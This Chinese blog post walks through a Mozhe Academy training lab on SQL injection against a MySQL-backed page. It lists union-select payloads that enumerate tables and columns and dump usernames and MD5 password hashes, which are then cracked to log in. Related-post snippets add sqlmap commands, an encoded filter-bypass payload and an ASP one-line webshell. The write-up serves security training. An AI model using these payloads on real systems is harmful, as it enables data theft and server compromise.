SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)

最新推荐文章于 2024-07-25 07:52:14 发布
原创 最新推荐文章于 2024-07-25 07:52:14 发布 · 3.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #mysql #安全

本文详细介绍了如何通过SQL注入漏洞进行测试和信息获取。首先,通过探测地址栏URL变化发现了可能的注入点,然后通过构造不同Payload验证了注入的存在,并确定了数据库字段数、回显位置。接着,获取了数据库名、版本、数据表名及字段信息,最终通过查询字段内容解密得到了关键数据,成功登录并获取了key。这个过程揭示了SQL注入攻击的步骤和技术细节。
SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)
地址:https://www.mozhe.cn/bug/djdsS0VVb0sxVytXY0NKMXZUeGJ4dz09bW96aGUmozhe?page=3

在这里插入图片描述

解题过程
  1. 寻找可注入网页,原网页尝试任意账密登录后地址栏没有回显,发现点击下图中的通知网页后地址栏信息为

    http://219.153.49.228:47011/new_list.php?id=1 //可能存在注入点
    在这里插入图片描述

  2. 寻找回显,构造Payload分别进行注入

    ?id=1 and 1=1 –

    ?id=1 and 1=2 –

在这里插入图片描述
在这里插入图片描述

说明存在注入点;
  1. 查询字段(列)数:字段数为4

    ?id=1 order by 4 –

    or

    ?id=1 order by 5 –

  2. 确认回显位置:2,3 均为回显位

    ?id=-1 union select 1,2,3,4 –

在这里插入图片描述

  1. 查询数据库名以及数据库版本:mozhe_Discuz_StormGroup

    ?id=-1 union select 1,database(),version(),4 –

在这里插入图片描述

  1. 查询数据表:StormGroup_member,notice

    ?id=-1 union select 1,group_concat(table_name),version(),4 from information_schema.tables where table_schema=database() –

在这里插入图片描述

  1. 查询字段:id,name,password,status

    ?id=-1 union select 1,group_concat(column_name),version(),4 from information_schema.columns where table_name=‘StormGroup_member’ and table_schema=database() –

在这里插入图片描述

  1. 查看字段内容:

    ?id=-1 union select 1,group_concat(id,0x3a,name,0x3a,password,0x3a,status),3,4 from StormGroup_member –

在这里插入图片描述

  1. 经查询得到两条数据,观察可得用户名name=‘mozhe’

    status(状态)一个为1,一个为0,考虑为1的密码是正确密码,经md5解密

在这里插入图片描述

  1. 登录原网页,拿到key:

在这里插入图片描述

墨者学院 - SQL注入实战-MySQL
多崎巡礼的博客
08-08 2134
两种解法 、利用sqlmap及其tamper模块base64encode使用 1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1 2.查看当前的系统信息 sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode 3.暴库 sqlmap -u "http:/...
墨者学院--SQL注入漏洞测试(HTTP头注入)
Routine_limon的博客
07-19 1033
这道题需要使用到Burp suite这个工具。先简单的说下使用步骤: 简述下4个按钮的作用: ①Forward的功能是当你查看过消息或者重新编辑过消息之后,点击此按钮,将发送消息至服务器端。 ②Drop的功能是你想丢失当前拦截的消息,不再forward到服务器端。 ③Interception is on表示拦截功能打开,拦截所有通过Burp Proxy的请求数据;Interception is ...
墨者学院 web sql 注入
gudugeji的博客
02-15 736
1、注入漏洞实战 burpsuite抓包 添加X-Forwarded-For:* 保存为.txt文件,放到sqlmap文件中 然后python sqlmap.py -r sql.txt --dbs -batch爆破 得到用户名和密码,登录得到flag2、布尔盲注 点开下面的通知,存在注入sqlmap.py -u http://219.153.49.228:49885/new_list.ph...
墨者学院SQL注入
2401_86440467的博客
07-25 661
进行布尔判断,添加语句and 1=1,页面显示正常,添加语句and 1=2,页面显示出错。证明存在sql注入
墨者学院SQL手工注入
qq_52074678的博客
12-11 542
相关知识 在MYSQL5.0以上版本,mysql存在个自带的数据库,名为information_schema,它是个存储记录有所有数据 库名,表名,列名的数据库,也相当于可以通过查询它获取数据库下面的表名或列名信息 table_name 表名 column_name 列名 table_schema 数据库名 information_schema.table 记录所有表名的表 information_schema.column 记录所有列名的表 info...
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 575
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入。1 and 1=2 回显不正常,可能存在SQL注入
墨者学院SQL手工注入漏洞测试(MySQL数据库)
muyuchen110的博客
07-22 613
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3852
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4166
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次样,有个登录系统,登录框下面有个维护新闻轮播框 我们点进去
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 2063
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
你们de4月天的博客
09-07 1468
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 1161
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 7077
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
墨者学院 - SQL注入实战(注入)-Access
多崎巡礼的博客
09-04 1623
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码 必应下 access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于个文件上传漏洞,可以直接在sqlin.asp中写入句话 在url后面添加句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的句话被过滤了 ...
墨者学院SQL注入(时间盲注)
weixin_45819911的博客
07-16 1165
墨者学院SQL注入(时间盲注)(手动注入+sqlmap+对于注入语句中的那个 ’ 的测试) 闲谈 这样写标题比较醒目,主要是想帮帮像我样的强迫症的小伙伴,(其实我发现是在线靶场的解题思路啥的看的人多,如果有小伙伴对于我的推测有不同见解的地方可以留言),因为我最近在刷墨者靶场的SQL注入部分,所以遇到自己觉得有意思的题会发出来,小伙白也可以留言告诉我些有意思的靶场(这是属于小白的进阶之路)。 0x00 注入点判断: 提示很明显,如图0: 图0 提示很明显是参数?type= 画风正常点的payload
墨者mysql注入_SQL注入实战-MySQL-墨者学院
weixin_29311017的博客
01-19 312
SQL注入实战-MySQL今天我将用两种方法来讲解,第种,SQLMap自动化跑数据库,第二种,利用火狐的hackbar来手工注入。【第种】1.先看这个url:http://219.153.49.228:45709/show.php?id=MQo=,般来说都是id=个数字,这个MQo=是属于base64加密,加密规律、规则请参考百度百科。2.用SQLMap的tamper插件,语句:sqlma...
墨者学院——入门SQL手工注入
Zichel77的博客
05-26 1554
关于SQL注入 SQL注入注入攻击,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。 攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授权访问...
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1592
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是sql注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
墨者学院-SQL注入漏洞测试(布尔盲注)
JimWu的博客
09-04 2796
SQL注入漏洞测试(布尔盲注) 难易程度:★ 题目类型:SQL注入 使用工具:FireFox浏览器、kali 1.打开靶场,寻找注入点。 点击公告/new_list.php?id=1,找到注入点。 2.输入id=1’ and 1=1,返回空页面 输入id=1 and 1=1,返回正常页面。 3.判断数据库名字的长度,输入id=1 and length(database())=1,返回空白页,证...
墨者学院SQL手工注入漏洞测试(MySQL数据库)
最新发布
12-29
### MySQL数据库中的SQL手工注入漏洞测试方法 #### 测试前准备 为了安全有效地进行SQL注入测试,建议在个受控环境中操作。通常会搭建个包含Nginx、PHP以及MySQL的靶场环境,在此环境下可以自由尝试各种攻击向量而不会影响生产数据。 #### 获取当前使用的数据库名称 通过构造特定查询语句来获取正在使用的数据库名是个常见的起点。例如,可以通过访问`/new_list.php?id=-1 union select 1,database(),3,4`这样的URL路径实现这点[^3]。这将返回当前连接到的应用程序所使用的具体数据库的名字。 #### 列出所有可用表格 旦知道了具体的数据库名字之后,下步就是找出该数据库中存在的所有表单。利用如下所示的HTTP请求字符串即可完成这目的:`/new_list.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3 -- -` 。这里假设已知的安全数据库名为'security'[^2]。请注意实际应用时应替换为之前获得的确切数据库名称。 #### 探索选定表内的列详情 当掌握了感兴趣的表的信息后,则可进步探索这些表内部的具体结构——即它们各自拥有的字段列表。对于每个想要了解其组成的表而言,都可以执行类似于下面这条命令的操作(以users为例): ```sql /new_list.php?id=-1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),DATABASE(),4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' ``` #### 提取敏感信息 最后步是从确认过的表里读取出有用的数据项。比如要查看用户账号及其密码哈希值的话,就可以发送像这样格式化的GET请求给服务器端口: ```sql /new_list.php?id=-1 UNION SELECT 1,username,password,DATABASE() FROM users-- ``` 以上过程展示了如何逐步深入挖掘潜在存在的SQL注入缺陷并从中提取有价值的情报。然而值得注意的是,上述技术仅适用于教育用途下的合法渗透测试活动;未经授权擅自入侵他人信息系统属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

克洛哀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值